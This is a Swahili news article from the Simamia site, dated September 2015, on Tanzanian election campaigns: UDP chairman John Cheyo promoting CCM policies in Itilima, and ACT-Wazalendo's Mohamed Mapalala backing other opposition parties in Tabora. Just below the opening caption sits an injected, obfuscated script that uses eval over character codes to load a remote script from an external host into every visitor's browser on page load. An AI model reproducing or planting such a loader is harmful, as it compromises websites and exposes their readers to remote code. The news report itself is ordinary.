Recent Comments

UDP yanadi sera za CCM

By Baraka Bitariho Sep 20, 2015
<p>Mwenyekiti wa Taifa wa UDP, John Cheyo</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Mwenyekiti wa Taifa wa UDP, John Cheyo
Mwenyekiti wa Taifa wa UDP, John Cheyo

MWENYEKITI wa Taifa wa chama cha United Democrat Party (UDP), John Cheyo, ambaye pia ni mgombea anayetetea kiti cha ubunge katika jimbo la Itilima mkoani Simiyu kupitia chama hicho, amezindua kampeni zake kwa kunadi sera za CCM.

Akizindua kampeni hizo jana katika uwanja wa mpira wa kikapu, Cheyo alisema katika sera yake pamoja na chama chake ni kuhakikisha elimu inatolewa bure kuanzia chekechea hadi kidato cha nne.

Mbali na sera hiyo, mgombea ubunge huyo pia alisema kuwa wananchi wakimpa ridhaa ya kuwa mbunge na kuchagua wagombea udiwani wa UDP, kila kijiji kitapatiwa Sh milioni 50 kwa ajili ya maendeleo ya vijana na akina mama.

Sera hizo ni miongoni mwa sera ambazo mgombea urais wa CCM, Dk John Magufuli, amekuwa akizinadi katika kampeni zake katika mikoa zaidi ya 13, ambako amekuwa akizunguka kwa gari vijiji kwa vijiji, miji kwa miji kuzungumza na wananchi.

Sera zingine CCM Mbali na sera hizo mbili, nyingine ambazo mgombea urais huyo wa CCM amekuwa akinadi ni pamoja na kuzuia kila aina ya usumbufu unaofanywa kwa wafanyabiashara wadogo, hasa mama lishe na bodaboda na kushusha bei ya vifaa vya ujenzi hasa saruji, mabati na misumari, ili wananchi wanaofanya kazi na kujipatia kipato halali wajenge nyumba bora.

Kwa wakulima, Dk Magufuli amekuwa akiahidi kuhakikisha pembejeo sahihi zinatolewa kwa wakati na mazao yatakayovunwa, itakuwa marufuku kwa Serikali kukopa mazao yao pamoja na kuondoa ushuru unaosumbua wafanyabiashara ndogo na hasa wakulima, ili wafanye biashara kwa uhuru wajipatie kipato halali.

Dk Magufuli pia amekuwa akiahidi kusambaza umeme, ili viwanda vidogo na vya kati vijengwe vijijini kusindika mazao ya kilimo, ambapo akiwa Kilombero aliahidi kuhakikisha mpunga unakobolewa na katika migogoro ya ardhi kati ya wakulima na wafugaji, aliahidi kutoa ardhi zaidi kwa ajili ya wakulima na wafugaji, ili kuondoa uhaba wa ardhi uliosababisha ugomvi wa maeneo ya kulishia mifugo na kulima.

Lakini pia amekuwa akiahidi kunyang’anya mashamba ambayo yamehodhiwa na watu bila kutumiwa kwa ufugaji wala kilimo, na kuyagawa kwa wakulima na wafugaji wasio na maeneo ya kilimo.

Cheyo na Ukawa Mbali na kunadi sera hizo za CCM, Cheyo pia alihoji mabadiliko yanayotangazwa kuletwa na mgombea urais wa Chadema, Edward Lowasa, kwamba alishindwa wapi kuyaleta wakati alipokuwa kiongozi ndani ya CCM.

Cheyo pia alieleza kushangazwa na Waziri Mkuu mstaafu aliyehama CCM, Frederick Sumaye kudai wataboresha kilimo cha pamba ikiwa Lowassa ataingia madarakani, wakati alikuwa Waziri Mkuu miaka 10 na kilimo hicho hakikuboreshwa.

ACT na Ukawa Katika hatua nyingine, mgombea ubunge wa Tabora Mjini kwa tiketi ya chama cha ACT-Wazalendo, Mohamed Mapalala, ameamua kushawishi wananchi wachague wagombea wa vyama vingine vya upinzani, ambako chama chake hawajaweka wagombea, kwani ndio wenye uchungu wa kweli wa kuleta maendeleo.

Alisema wameweka wagombea udiwani katika kata 22 kati ya 29 za Manispaa ya Tabora, na hata zile ambazo wagombea wao wameenguliwa wanawapigia debe wagombea wa vyama vya Chadema, NCCR-Mageuzi, CUF na NLD vilivyounda Ukawa ili kuunganisha nguvu za kutetea wananchi.

Akihutubia mkutano wa hadhara uliofanyika jana katika uwanja wa Community Center katika Manispaa ya Tabora, Mapalala alisema chama chake kimechoshwa na huduma mbovu za kijamii hususani huduma za afya, elimu na maji.

Alisema wagombea pekee wanaoweza kusimamia vizuri matumizi ya fedha za miradi ya maendeleo na utekelezaji wake na kushinikiza watendaji wa Serikali, kutenda haki kwa wananchi ni wale wa ACT na vyama vingine vya upinzani na sio wa CCM.

Imeandikwa na Kareny Masasy, Itilima na Lucas Raphael, Tabora.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com